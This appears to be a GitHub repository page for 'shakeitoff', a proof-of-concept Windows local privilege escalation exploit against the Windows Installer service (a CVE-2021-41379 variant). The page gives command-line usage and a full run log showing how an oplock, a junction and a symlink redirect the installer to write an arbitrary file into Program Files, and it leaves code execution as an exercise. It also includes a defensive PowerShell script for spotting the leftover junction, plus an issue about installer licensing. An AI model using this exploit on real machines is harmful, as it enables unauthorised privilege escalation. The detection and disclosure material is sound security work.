Windows LPE 0-day

Overview

shakeitoff

A smaller, minimized, and cleaner version of InstallerFileTakeOver, aka the zero-day exploit that is a "variation" of CVE-2021-41379. This version does not pop a shell like InstallerFileTakeOver does. The point of this code was to create a simpler proof of concept that more reliably demonstrates the file creation attack. This proof of concept will create the arbitrary file requested by the user (and copy itself into it to prove writability). Demonstrating code execution is a trivial exercise left up to the reader.

To understand how the attack works, please see the AttackerKB write-up.

Usage

The tool requires three parameters:

C:\Users\albinolobster\source\repos\shakeitoff\x64\Release>.\shakeitoff.exe
option "msi_path" is required
Allowed options:
  -h, --help              produce help message
  -m, --msi_path arg      The path to the MSI to install
  -i, --install_path arg  The path to install to
  -p, --target_path arg   The file to create

1. -m - the MSI to install (full path required). One is provided in this repository (and you should use it, since the file paths actually matter).
2. -i - the install path (full path required). This is where the MSI is installed and where the exploit goes down. The user must specify this beforehand and it must be an empty directory. The tool doesn't clean it up because it makes figuring out the bug easier. There also must be a trailing \ because I'm a monster.
3. -p - the file to overwrite/create. Full path required.

The PoC will just copy itself into the target file.

Usage Example

C:\Users\Public>dir "C:\Program Files\lol"
 Volume in drive C has no label.
 Volume Serial Number is 5E1E-AC13

 Directory of C:\Program Files

File Not Found

C:\Users\Public>.\shakeitoff.exe -m C:\Users\Public\shakeitoff.msi -i C:\Users\Public\lol\ -p "C:\Program Files\lol"
[+] User provided MSI path: C:\Users\Public\shakeitoff.msi
[+] The target path is: C:\Program Files\lol
[+] Create the temp directory structure we'll install into
[+] Grabbing handle to lock C:\Users\Public\lol\shakeitoff\haters.jpg
[+] Grabbing a directory handle of C:\Users\Public\lol\shakeitoff\
[+] Monitor shakeitoff\shakeitoff for an rbf file
[+] MSI install: ACTION=ADMIN REBOOT=ReallySuppress TARGETDIR=C:\Users\Public\lol\ C:\Users\Public\shakeitoff.msi
[+] Grabbing a handle to inner shakeitoff directory
[+] In callback for oplock one
[+] Opening handle to C:\Users\Public\lol\shakeitoff\8da858.rbf
[+] Creating the callback directory at C:\Users\Public\lol\cb_directory
[+] Grab a handle for the callback directry
[+] Creating a junction from C:\Users\Public\lol\cb_directory to \BaseNamedObjects\Restricted
[+] Inside callback two
[+] Release the hater.jpg handle to unlock
[+] Move the rbf file to C:\Users\Public\lol\weird_directory
[+] Move inner shakeitoff to C:\Users\Public\lol\weird_directory
[+] Move junction at C:\Users\Public\lol\cb_directory to C:\Users\Public\lol\shakeitoff
[+] Configuring symlink from \BaseNamedObjects\Restricted\8da858.rbf to \??\C:\Program Files\lol
[+] symlink created!
[+] MsiInstallProductA return value: 1603
[+] Exploit thread joined
[+] Copy into target!

C:\Users\Public>dir "C:\Program Files\lol"
 Volume in drive C has no label.
 Volume Serial Number is 5E1E-AC13

 Directory of C:\Program Files

12/02/2021  02:01 PM           368,640 lol
               1 File(s)        368,640 bytes
               0 Dir(s)  86,015,610,880 bytes free
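
As an added triage example (this is not part of shakeitoff and not the author's code), the PowerShell below checks what a run like the one above leaves behind: the junction under the -i directory that was pointed at the object manager namespace, the owner and ACL of the file that landed in Program Files, and the installer service's own event log entries for the failed install. It assumes the install and target paths from the example and parses the standard "Substitute Name:" line of fsutil's reparse point output; run it from an elevated prompt if fsutil refuses to query the reparse data.

```powershell
# Added triage script, not part of shakeitoff. Defaults are the paths used in
# the usage example above; pass your own -i and -p values otherwise.
param(
    [string]$InstallDir = 'C:\Users\Public\lol\',
    [string]$TargetPath = 'C:\Program Files\lol'
)

# 1. Reparse points under the install directory. The log above shows a junction
#    created at cb_directory and then moved over shakeitoff\; since the tool does
#    not clean up, it should still be there. fsutil prints the raw reparse buffer;
#    the Substitute Name is what the kernel actually follows. A normal junction
#    substitutes a \??\C:\... path, the exploit's junction substitutes an object
#    manager directory (\BaseNamedObjects\...) instead, which is the tell.
Get-ChildItem -LiteralPath $InstallDir -Recurse -Force -Attributes ReparsePoint -ErrorAction SilentlyContinue |
    ForEach-Object {
        $raw = (& fsutil.exe reparsepoint query $_.FullName 2>&1) -join "`n"
        $sub = if ($raw -match 'Substitute Name:\s*(\S.*)') { $Matches[1].Trim() } else { '<unreadable>' }
        [pscustomobject]@{
            Path            = $_.FullName
            SubstituteName  = $sub
            IntoObjectMgrNs = ($sub -ne '<unreadable>') -and ($sub -notlike '\??\*') -and ($sub -notlike '\\?\*')
        }
    }

# 2. What landed in Program Files. A standard user cannot create files there
#    directly, so the owner and any write-granting ACEs show what the installer
#    service did on the user's behalf and why the PoC's final copy succeeded.
if (Test-Path -LiteralPath $TargetPath) {
    $item = Get-Item -LiteralPath $TargetPath -Force
    $acl  = Get-Acl -LiteralPath $TargetPath
    [pscustomobject]@{
        Path    = $item.FullName
        Bytes   = $item.Length
        Owner   = $acl.Owner
        Created = $item.CreationTime
    }
    $acl.Access |
        Where-Object { $_.AccessControlType -eq 'Allow' -and $_.FileSystemRights -match 'Write|Modify|FullControl' } |
        Select-Object IdentityReference, FileSystemRights, IsInherited
} else {
    "Target $TargetPath does not exist: the run did not get as far as the redirect."
}

# 3. Windows Installer records install results in the Application log under the
#    MsiInstaller provider; the 1603 seen above should have a matching entry.
#    Pull the last ten minutes so it can be correlated with the file's CreationTime.
Get-WinEvent -FilterHashtable @{
        LogName      = 'Application'
        ProviderName = 'MsiInstaller'
        StartTime    = (Get-Date).AddMinutes(-10)
    } -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, Id, @{ n = 'Message'; e = { ($_.Message -split "`n")[0] } }
```

The junction check is the one worth keeping as a detection idea: a mount point whose substitute name is not a `\??\` filesystem path has no legitimate reason to exist in a user-writable directory, and it is visible on disk after the fact precisely because the tool leaves the -i directory untouched.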

Credit

  • This code is influenced by the original exploit published by Abdelhamid Naceri (also the original vulnerability discoverer!).
  • The FileOpLock code is a (slightly modified) version pulled out of angrypolarbearbug2
  • Taylor Swift

Issues

  • Update AIP File To Compile Under Freeware Version

    By updating this file, you remove the line (Evaluation Version) from being added to all the binaries, making them smaller, and you also prevent Advanced Installer from prompting you to start a license trial and thinking that you need a valid license or license trial to compile the MSI when in reality you aren't using any of the paid features and Advanced Installer is just reading this part of the XML file and going "Oh the file says this so we must need a valid license file or trial to compile the product".

    Don't ask me why the product doesn't have a better way of determining the requirements for licensing, I really have no idea why it decided that a line in an XML file is the primary determinant of what features are required as I know there are better ways to do things, but it is what it is.

    This also allows people to be compliant with the license requirements which state that:

    2.2 Trial Period License. You may download and use the Software for free for thirty (30) days after installation ("Trial Period"). During the Trial Period, Caphyon grants You a limited, non-exclusive, non-transferable, non-renewable license to copy and use the Software for evaluation purposes only and not for any commercial use. At Caphyon's discretion, Caphyon may provide limited support through email or discussion forums at Caphyon web site. The evaluation copy of the Software contains a feature that will automatically disable the Software at the end of Trial Period. Caphyon will have no liability to you if this feature disables the Software.
    

    Note that it explicitly states for evaluation purpose only and not for commercial use, whereas the freeware version states:

    2.1 Freeware Features License. Caphyon grants you an unlimited license to use the Freeware Features of the Software. The install packages created using only the Freeware Features can be freely redistributed and used both in commercial and non-commercial purpose.
    

    Or as a TLDR: we aren't using any paid features but due to this file it thinks we are. Since the freeware version doesn't impose any restrictions and we aren't using any paid features that require a paid license this kills two birds with one stone by complying with licensing and also prevents people accidentally starting a trial when they don't need to.

    opened by gwillcox-r7